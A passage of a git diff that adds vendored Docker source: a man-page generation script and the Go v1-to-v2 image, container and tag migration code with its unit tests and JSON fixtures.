a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh new file mode 100755 index 0000000000..97c65c93bc --- /dev/null +++ b/vendor/github.com/docker/docker/man/md2man-all.sh @@ -0,0 +1,22 @@ +#!/bin/bash +set -e + +# get into this script's directory +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +[ "$1" = '-q' ] || { + set -x + pwd +} + +for FILE in *.md; do + base="$(basename "$FILE")" + name="${base%.md}" + num="${name##*.}" + if [ -z "$num" -o "$name" = "$num" ]; then + # skip files that aren't of the format xxxx.N.md (like README.md) + continue + fi + mkdir -p "./man${num}" + go-md2man -in "$FILE" -out "./man${num}/${name}" +done diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go new file mode 100644 index 0000000000..bc42dd2ca4 --- /dev/null +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go @@ -0,0 +1,504 @@ +package v1 + +import ( + "errors" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strconv" + "sync" + "time" + + "encoding/json" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/image" + imagev1 "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/reference" +) + +type graphIDRegistrar interface { + RegisterByGraphID(string, layer.ChainID, layer.DiffID, string, int64) (layer.Layer, error) + Release(layer.Layer) ([]layer.Metadata, error) +} + +type graphIDMounter interface { + CreateRWLayerByGraphID(string, string, layer.ChainID) error +} + +type checksumCalculator interface { + ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID layer.DiffID, size int64, err error) +} + +const ( + graphDirName = "graph" + tarDataFileName = "tar-data.json.gz" + migrationFileName = ".migration-v1-images.json" + migrationTagsFileName = ".migration-v1-tags" + migrationDiffIDFileName = ".migration-diffid" + migrationSizeFileName = ".migration-size" + migrationTarDataFileName = ".migration-tardata" + containersDirName = "containers" + configFileNameLegacy = "config.json" + configFileName = "config.v2.json" + repositoriesFilePrefixLegacy = "repositories-" +) + +var ( + errUnsupported = errors.New("migration is not supported") +) + +// Migrate takes an old graph directory and transforms the metadata into the +// new format. +func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error { + graphDir := filepath.Join(root, graphDirName) + if _, err := os.Lstat(graphDir); os.IsNotExist(err) { + return nil + } + + mappings, err := restoreMappings(root) + if err != nil { + return err + } + + if cc, ok := ls.(checksumCalculator); ok { + CalculateLayerChecksums(root, cc, mappings) + } + + if registrar, ok := ls.(graphIDRegistrar); !ok { + return errUnsupported + } else if err := migrateImages(root, registrar, is, ms, mappings); err != nil { + return err + } + + err = saveMappings(root, mappings) + if err != nil { + return err + } + + if mounter, ok := ls.(graphIDMounter); !ok { + return errUnsupported + } else if err := migrateContainers(root, mounter, is, mappings); err != nil { + return err + } + + if err := migrateRefs(root, driverName, rs, mappings); err != nil { + return err + } + + return nil +} + +// CalculateLayerChecksums walks an old graph directory and calculates checksums +// for each layer. These checksums are later used for migration. +func CalculateLayerChecksums(root string, ls checksumCalculator, mappings map[string]image.ID) { + graphDir := filepath.Join(root, graphDirName) + // spawn some extra workers also for maximum performance because the process is bounded by both cpu and io + workers := runtime.NumCPU() * 3 + workQueue := make(chan string, workers) + + wg := sync.WaitGroup{} + + for i := 0; i < workers; i++ { + wg.Add(1) + go func() { + for id := range workQueue { + start := time.Now() + if err := calculateLayerChecksum(graphDir, id, ls); err != nil { + logrus.Errorf("could not calculate checksum for %q, %q", id, err) + } + elapsed := time.Since(start) + logrus.Debugf("layer %s took %.2f seconds", id, elapsed.Seconds()) + } + wg.Done() + }() + } + + dir, err := ioutil.ReadDir(graphDir) + if err != nil { + logrus.Errorf("could not read directory %q", graphDir) + return + } + for _, v := range dir { + v1ID := v.Name() + if err := imagev1.ValidateID(v1ID); err != nil { + continue + } + if _, ok := mappings[v1ID]; ok { // support old migrations without helper files + continue + } + workQueue <- v1ID + } + close(workQueue) + wg.Wait() +} + +func calculateLayerChecksum(graphDir, id string, ls checksumCalculator) error { + diffIDFile := filepath.Join(graphDir, id, migrationDiffIDFileName) + if _, err := os.Lstat(diffIDFile); err == nil { + return nil + } else if !os.IsNotExist(err) { + return err + } + + parent, err := getParent(filepath.Join(graphDir, id)) + if err != nil { + return err + } + + diffID, size, err := ls.ChecksumForGraphID(id, parent, filepath.Join(graphDir, id, tarDataFileName), filepath.Join(graphDir, id, migrationTarDataFileName)) + if err != nil { + return err + } + + if err := ioutil.WriteFile(filepath.Join(graphDir, id, migrationSizeFileName), []byte(strconv.Itoa(int(size))), 0600); err != nil { + return err + } + + if err := ioutils.AtomicWriteFile(filepath.Join(graphDir, id, migrationDiffIDFileName), []byte(diffID), 0600); err != nil { + return err + } + + logrus.Infof("calculated checksum for layer %s: %s", id, diffID) + return nil +} + +func restoreMappings(root string) (map[string]image.ID, error) { + mappings := make(map[string]image.ID) + + mfile := filepath.Join(root, migrationFileName) + f, err := os.Open(mfile) + if err != nil && !os.IsNotExist(err) { + return nil, err + } else if err == nil { + err := json.NewDecoder(f).Decode(&mappings) + if err != nil { + f.Close() + return nil, err + } + f.Close() + } + + return mappings, nil +} + +func saveMappings(root string, mappings map[string]image.ID) error { + mfile := filepath.Join(root, migrationFileName) + f, err := os.OpenFile(mfile, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return err + } + defer f.Close() + if err := json.NewEncoder(f).Encode(mappings); err != nil { + return err + } + return nil +} + +func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error { + graphDir := filepath.Join(root, graphDirName) + + dir, err := ioutil.ReadDir(graphDir) + if err != nil { + return err + } + for _, v := range dir { + v1ID := v.Name() + if err := imagev1.ValidateID(v1ID); err != nil { + continue + } + if _, exists := mappings[v1ID]; exists { + continue + } + if err := migrateImage(v1ID, root, ls, is, ms, mappings); err != nil { + continue + } + } + + return nil +} + +func migrateContainers(root string, ls graphIDMounter, is image.Store, imageMappings map[string]image.ID) error { + containersDir := filepath.Join(root, containersDirName) + dir, err := ioutil.ReadDir(containersDir) + if err != nil { + return err + } + for _, v := range dir { + id := v.Name() + + if _, err := os.Stat(filepath.Join(containersDir, id, configFileName)); err == nil { + continue + } + + containerJSON, err := ioutil.ReadFile(filepath.Join(containersDir, id, configFileNameLegacy)) + if err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + var c map[string]*json.RawMessage + if err := json.Unmarshal(containerJSON, &c); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + imageStrJSON, ok := c["Image"] + if !ok { + return fmt.Errorf("invalid container configuration for %v", id) + } + + var image string + if err := json.Unmarshal([]byte(*imageStrJSON), &image); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + imageID, ok := imageMappings[image] + if !ok { + logrus.Errorf("image not migrated %v", imageID) // non-fatal error + continue + } + + c["Image"] = rawJSON(imageID) + + containerJSON, err = json.Marshal(c) + if err != nil { + return err + } + + if err := ioutil.WriteFile(filepath.Join(containersDir, id, configFileName), containerJSON, 0600); err != nil { + return err + } + + img, err := is.Get(imageID) + if err != nil { + return err + } + + if err := ls.CreateRWLayerByGraphID(id, id, img.RootFS.ChainID()); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + logrus.Infof("migrated container %s to point to %s", id, imageID) + + } + return nil +} + +type refAdder interface { + AddTag(ref reference.Named, id digest.Digest, force bool) error + AddDigest(ref reference.Canonical, id digest.Digest, force bool) error +} + +func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image.ID) error { + migrationFile := filepath.Join(root, migrationTagsFileName) + if _, err := os.Lstat(migrationFile); !os.IsNotExist(err) { + return err + } + + type repositories struct { + Repositories map[string]map[string]string + } + + var repos repositories + + f, err := os.Open(filepath.Join(root, repositoriesFilePrefixLegacy+driverName)) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + defer f.Close() + if err := json.NewDecoder(f).Decode(&repos); err != nil { + return err + } + + for name, repo := range repos.Repositories { + for tag, id := range repo { + if strongID, exists := mappings[id]; exists { + ref, err := reference.WithName(name) + if err != nil { + logrus.Errorf("migrate tags: invalid name %q, %q", name, err) + continue + } + if dgst, err := digest.ParseDigest(tag); err == nil { + canonical, err := reference.WithDigest(reference.TrimNamed(ref), dgst) + if err != nil { + logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err) + continue + } + if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil { + logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err) + } + } else { + tagRef, err := reference.WithTag(ref, tag) + if err != nil { + logrus.Errorf("migrate tags: invalid tag %q, %q", tag, err) + continue + } + if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil { + logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err) + } + } + logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID) + } + } + } + + mf, err := os.Create(migrationFile) + if err != nil { + return err + } + mf.Close() + + return nil +} + +func getParent(confDir string) (string, error) { + jsonFile := filepath.Join(confDir, "json") + imageJSON, err := ioutil.ReadFile(jsonFile) + if err != nil { + return "", err + } + var parent struct { + Parent string + ParentID digest.Digest `json:"parent_id"` + } + if err := json.Unmarshal(imageJSON, &parent); err != nil { + return "", err + } + if parent.Parent == "" && parent.ParentID != "" { // v1.9 + parent.Parent = parent.ParentID.Hex() + } + // compatibilityID for parent + parentCompatibilityID, err := ioutil.ReadFile(filepath.Join(confDir, "parent")) + if err == nil && len(parentCompatibilityID) > 0 { + parent.Parent = string(parentCompatibilityID) + } + return parent.Parent, nil +} + +func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) (err error) { + defer func() { + if err != nil { + logrus.Errorf("migration failed for %v, err: %v", id, err) + } + }() + + parent, err := getParent(filepath.Join(root, graphDirName, id)) + if err != nil { + return err + } + + var parentID image.ID + if parent != "" { + var exists bool + if parentID, exists = mappings[parent]; !exists { + if err := migrateImage(parent, root, ls, is, ms, mappings); err != nil { + // todo: fail or allow broken chains? + return err + } + parentID = mappings[parent] + } + } + + rootFS := image.NewRootFS() + var history []image.History + + if parentID != "" { + parentImg, err := is.Get(parentID) + if err != nil { + return err + } + + rootFS = parentImg.RootFS + history = parentImg.History + } + + diffIDData, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationDiffIDFileName)) + if err != nil { + return err + } + diffID, err := digest.ParseDigest(string(diffIDData)) + if err != nil { + return err + } + + sizeStr, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationSizeFileName)) + if err != nil { + return err + } + size, err := strconv.ParseInt(string(sizeStr), 10, 64) + if err != nil { + return err + } + + layer, err := ls.RegisterByGraphID(id, rootFS.ChainID(), layer.DiffID(diffID), filepath.Join(root, graphDirName, id, migrationTarDataFileName), size) + if err != nil { + return err + } + logrus.Infof("migrated layer %s to %s", id, layer.DiffID()) + + jsonFile := filepath.Join(root, graphDirName, id, "json") + imageJSON, err := ioutil.ReadFile(jsonFile) + if err != nil { + return err + } + + h, err := imagev1.HistoryFromConfig(imageJSON, false) + if err != nil { + return err + } + history = append(history, h) + + rootFS.Append(layer.DiffID()) + + config, err := imagev1.MakeConfigFromV1Config(imageJSON, rootFS, history) + if err != nil { + return err + } + strongID, err := is.Create(config) + if err != nil { + return err + } + logrus.Infof("migrated image %s to %s", id, strongID) + + if parentID != "" { + if err := is.SetParent(strongID, parentID); err != nil { + return err + } + } + + checksum, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, "checksum")) + if err == nil { // best effort + dgst, err := digest.ParseDigest(string(checksum)) + if err == nil { + V2MetadataService := metadata.NewV2MetadataService(ms) + V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst}) + } + } + _, err = ls.Release(layer) + if err != nil { + return err + } + + mappings[id] = strongID + return +} + +func rawJSON(value interface{}) *json.RawMessage { + jsonval, err := json.Marshal(value) + if err != nil { + return nil + } + return (*json.RawMessage)(&jsonval) +} diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go new file mode 100644 index 0000000000..be82fdc75e --- /dev/null +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go @@ -0,0 +1,438 @@ +package v1 + +import ( + "crypto/rand" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +func TestMigrateRefs(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-tags") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108","sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"},"registry":{"2":"5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d","latest":"8d5547a9f329b1d3f93198cd661fb5117e5a96b721c5cf9a2c389e7dd4877128"}}}`), 0600) + + ta := &mockTagAdder{} + err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{ + "5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d": image.ID("sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"), + "b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"), + "abcdef3434c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:56434342345ae68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"), + }) + if err != nil { + t.Fatal(err) + } + + expected := map[string]string{ + "busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", + } + + if !reflect.DeepEqual(expected, ta.refs) { + t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs) + } + + // second migration is no-op + ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"`), 0600) + err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{ + "b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"), + }) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expected, ta.refs) { + t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs) + } +} + +func TestMigrateContainers(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + if runtime.GOARCH != "amd64" { + t.Skip("Test tailored to amd64 architecture") + } + tmpdir, err := ioutil.TempDir("", "migrate-containers") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + err = addContainer(tmpdir, `{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`) + if err != nil { + t.Fatal(err) + } + + // container with invalid image + err = addContainer(tmpdir, `{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"e780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"4c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`) + if err != nil { + t.Fatal(err) + } + + ls := &mockMounter{} + + ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) + if err != nil { + t.Fatal(err) + } + + is, err := image.NewImageStore(ifs, ls) + if err != nil { + t.Fatal(err) + } + + imgID, err := is.Create([]byte(`{"architecture":"amd64","config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["sh"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","history":[{"created":"2015-10-31T22:22:54.690851953Z","created_by":"/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"},{"created":"2015-10-31T22:22:55.613815829Z","created_by":"/bin/sh -c #(nop) CMD [\"sh\"]"}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1","sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"]}}`)) + if err != nil { + t.Fatal(err) + } + + err = migrateContainers(tmpdir, ls, is, map[string]image.ID{ + "2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093": imgID, + }) + if err != nil { + t.Fatal(err) + } + + expected := []mountInfo{{ + "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", + "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", + "sha256:c3191d32a37d7159b2e30830937d2e30268ad6c375a773a8994911a3aba9b93f", + }} + if !reflect.DeepEqual(expected, ls.mounts) { + t.Fatalf("invalid mounts: expected %q, got %q", expected, ls.mounts) + } + + if actual, expected := ls.count, 0; actual != expected { + t.Fatalf("invalid active mounts: expected %d, got %d", expected, actual) + } + + config2, err := ioutil.ReadFile(filepath.Join(tmpdir, "containers", "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", "config.v2.json")) + if err != nil { + t.Fatal(err) + } + var config struct{ Image string } + err = json.Unmarshal(config2, &config) + if err != nil { + t.Fatal(err) + } + + if actual, expected := config.Image, string(imgID); actual != expected { + t.Fatalf("invalid image pointer in migrated config: expected %q, got %q", expected, actual) + } + +} + +func TestMigrateImages(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + if runtime.GOARCH != "amd64" { + t.Skip("Test tailored to amd64 architecture") + } + tmpdir, err := ioutil.TempDir("", "migrate-images") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // busybox from 1.9 + id1, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"],"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:54.690851953Z","docker_version":"1.8.2","layer_id":"sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57","os":"linux"}`, "", "") + if err != nil { + t.Fatal(err) + } + + id2, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","layer_id":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4","os":"linux","parent_id":"sha256:039b63dd2cbaa10d6015ea574392530571ed8d7b174090f032211285a71881d0"}`, id1, "") + if err != nil { + t.Fatal(err) + } + + ls := &mockRegistrar{} + + ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) + if err != nil { + t.Fatal(err) + } + + is, err := image.NewImageStore(ifs, ls) + if err != nil { + t.Fatal(err) + } + + ms, err := metadata.NewFSMetadataStore(filepath.Join(tmpdir, "distribution")) + if err != nil { + t.Fatal(err) + } + mappings := make(map[string]image.ID) + + err = migrateImages(tmpdir, ls, is, ms, mappings) + if err != nil { + t.Fatal(err) + } + + expected := map[string]image.ID{ + id1: image.ID("sha256:ca406eaf9c26898414ff5b7b3a023c33310759d6203be0663dbf1b3a712f432d"), + id2: image.ID("sha256:a488bec94bb96b26a968f913d25ef7d8d204d727ca328b52b4b059c7d03260b6"), + } + + if !reflect.DeepEqual(mappings, expected) { + t.Fatalf("invalid image mappings: expected %q, got %q", expected, mappings) + } + + if actual, expected := ls.count, 2; actual != expected { + t.Fatalf("invalid register count: expected %q, got %q", expected, actual) + } + ls.count = 0 + + // next images are busybox from 1.8.2 + _, err = addImage(tmpdir, `{"id":"17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2","parent":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:55.613815829Z","container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":0}`, "", "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4") + if err != nil { + t.Fatal(err) + } + + _, err = addImage(tmpdir, `{"id":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:54.690851953Z","container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"],"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":1108935}`, "", 